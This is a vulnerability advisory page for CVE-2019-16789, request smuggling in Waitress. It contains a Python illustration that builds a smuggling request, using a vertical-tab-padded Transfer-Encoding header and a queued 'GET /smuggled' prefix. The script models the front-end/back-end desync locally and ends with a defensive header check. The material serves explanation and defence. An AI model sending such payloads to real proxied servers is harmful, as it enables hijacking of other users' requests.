CVE-2019-16789 — HTTP Request Smuggling in Waitress
Severity: CVSS 8.2 HIGH (NVD); CNA score 7.1
EPSS: 0.9% (top 24.57%)
CISA KEV: not in KEV
Exploit: no known exploits
Timeline: published Dec 26; latest update Apr 15
Description
In Waitress through version 1.4.0, when a proxy server is used in front of Waitress, an attacker can send an invalid request that is accepted by the front-end but parsed differently by Waitress, leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header are parsed by Waitress as a chunked request, whereas a front-end server uses the Content-Length instead, as the Transfer-Encoding header is co…
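The following Python is an added illustration of the framing mismatch the description refers to; it is not Waitress's own code and not a payload from any advisory. It models two header parsers over one constructed request: an RFC 7230 front-end that treats only SP and HTAB as header whitespace, discards a Transfer-Encoding value that still contains a control byte, and falls back to Content-Length; and a lenient back-end built on Python's bytes.strip(), which also removes 0x0B and 0x0C, honours "chunked", and so leaves the tail of the body unread as the start of the next request on the connection. The vertical-tab byte, the example.test host, the /smuggled path and the two parser models are assumptions for the example; the page does not say which whitespace bytes Waitress accepted.

```python
# Added example (not Waitress code): models the CL.TE desync between an
# RFC-conformant front-end and a lenient back-end on one constructed request.

# Assumption: 0x0B (vertical tab) stands in for the "special whitespace
# character"; the page does not say which bytes Waitress accepted.
ODD_WS = b"\x0b"
RFC_OWS = b" \t"           # RFC 7230 optional whitespace: SP and HTAB only

# Constructed attacker payload: a terminating zero chunk followed by the prefix
# of a second request; the victim's next request is appended to that prefix.
SMUGGLED = b"GET /smuggled HTTP/1.1\r\nX-Ignore: "
BODY = b"0\r\n\r\n" + SMUGGLED


def build_request() -> bytes:
    """Constructed request. Content-Length covers the whole body so a
    Content-Length front-end forwards everything as one request."""
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: example.test\r\n"
        b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
        b"Transfer-Encoding:" + ODD_WS + b"chunked\r\n"
        b"\r\n" + BODY
    )


def split_request(raw: bytes):
    """Return (request line, header block, payload after the blank line)."""
    head, _, payload = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    return request_line, header_block, payload


def parse_headers(header_block: bytes, strict: bool) -> dict:
    """strict=True models the front-end: only SP/HTAB are trimmed and a field
    whose value still holds a CTL byte is discarded.
    strict=False models a lenient parser built on bytes.strip(), which also
    removes 0x0B and 0x0C and so reads ':<VT>chunked' as 'chunked'."""
    headers = {}
    for line in header_block.split(b"\r\n"):
        if not line:
            continue
        name, _, value = line.partition(b":")
        if strict:
            value = value.strip(RFC_OWS)
            if any(c < 0x20 or c == 0x7F for c in value):
                continue                # malformed field: dropped
        else:
            value = value.strip()
        headers[name.strip().lower()] = value
    return headers


def frame_body(headers: dict, payload: bytes):
    """Delimit the first request's body the way this parser would and return
    (body, leftover bytes that will be read as the next request)."""
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        body, pos = b"", 0
        while True:
            eol = payload.index(b"\r\n", pos)
            size = int(payload[pos:eol], 16)
            pos = eol + 2
            if size == 0:               # last chunk; no trailers assumed
                return body, payload[pos + 2:]
            body += payload[pos:pos + size]
            pos += size + 2
    length = int(headers.get(b"content-length", b"0"))
    return payload[:length], payload[length:]


def has_ctl_in_headers(header_block: bytes) -> bool:
    """Hardened pre-check for a back-end: any CTL other than HTAB inside a
    header line (CRLF already split off) means reject with 400, not repair."""
    return any(
        (c < 0x20 and c != 0x09) or c == 0x7F
        for line in header_block.split(b"\r\n") for c in line
    )


def desync():
    """Frame the same bytes as the front-end and as the lenient back-end would."""
    _, header_block, payload = split_request(build_request())
    front = frame_body(parse_headers(header_block, strict=True), payload)
    back = frame_body(parse_headers(header_block, strict=False), payload)
    return front, back


if __name__ == "__main__":
    front, back = desync()
    print("front-end body:", front[0], "leftover:", front[1])
    print("back-end  body:", back[0], "leftover:", back[1])
```

The front-end consumes the full Content-Length body and has nothing left over; the back-end ends the chunked body at the zero chunk and keeps the smuggled prefix queued for the next request on that connection. The check a back-end should apply is the one in has_ctl_in_headers: a header line with a control byte other than HTAB is a malformed request to be rejected with a 400, never normalised into something parseable, and the same applies to a request that carries both Content-Length and Transfer-Encoding. For deployments behind a proxy the page's own remedy is to run a Waitress version newer than 1.4.0, the last release it lists as affected.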
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N (exploitability 3.9, impact 4.2)
Affected packages: 4 packages; also affects Debian Linux 9.0, Fedora 30, 31
References
Vulnerability details (4 entries): OSV, GHSA
Vendor advisories (3 entries): Red Hat, Debian
  Debian, 2019: CVE-2019-16789: waitress - In Waitress through version 1.4.0, if a proxy server is used in front of waitres...
Community (4 entries): Bugzilla
  2020-01-14: CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [openstack-rdo]
  2020-01-10: CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [fedora-all]
  2020-01-10: CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [epel-all]
  2020-01-10: CVE-2019-16789 waitress: HTTP Request Smuggling through Invalid whitespace characters in headers